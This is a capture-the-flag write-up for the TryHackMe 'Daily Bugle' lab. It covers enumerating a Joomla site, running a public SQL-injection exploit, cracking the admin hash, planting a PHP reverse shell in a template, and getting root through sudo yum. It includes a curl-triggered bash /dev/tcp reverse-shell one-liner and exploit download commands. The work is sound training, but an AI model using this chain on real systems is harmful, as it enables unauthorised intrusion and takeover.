Back to writeups

Daily Bugle — TryHackMe

Web Enumeration Privilege Escalation Linux

Access the target server

Daily Bugle webpage loaded in browser

Scanning Target

sudo nmap -p- -sS -sV -sC -T4 <TARGET_IP>
Nmap scan results

Enumerating Endpoints

feroxbuster -u http://<TARGET_IP>/
Feroxbuster results showing administrator endpoint

Interesting discovery: /administrator

Joomla Version Discovery

curl -s http://<TARGET_IP>/administrator/manifests/files/joomla.xml
Joomla version XML output

Admin Page

Joomla admin login page

Searching Exploit

Found Joomla 3.7 exploit and downloaded: 

wget https://raw.githubusercontent.com/stefanlucas/Exploit-Joomla/master/joomblah.py
python3 joomblah.py http://<TARGET_IP>/
Exploit repository Exploit leaking credentials

Cracking Credentials

Extracted hash → cracked with John:

john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
John cracked password

Login success:

Joomla admin dashboard

Template Editing to Achieve RCE

Available templates:

Joomla template list

Injected PHP reverse shell in templates/protostar/error.php

Injected PHP code

Triggering Payload

Access a non-existent page to trigger error:

Triggering error page

Reverse Shell

nc -lvnp 4444

curl "http://<TARGET_IP>/index.php/qqq?cmd=bash -c 'bash -i >& /dev/tcp/<MY_IP>/4444 0>&1'"
Reverse shell connected Navigating shell session

Credential Discovery

Inside /var/www/html found DB credentials.

Database credentials found in config

SSH Access

ssh jjameson@<IP>
SSH session success
User Flag Obtained
User flag

Privilege Escalation

Check sudo privileges:

sudo -l
sudo -l output

User can run yum as root → GTFOBins:

https://gtfobins.github.io/gtfobins/yum/#sudo
GTFOBins page

Execute exploit → root.

Root Flag Obtained
Root flag

Final Notes

  • CMS exploitation is extremely realistic in real-world engagements.
  • Template editors are powerful RCE entry points.
  • Credential reuse continues to be a serious risk.
  • Sudo misconfigurations remain deadly.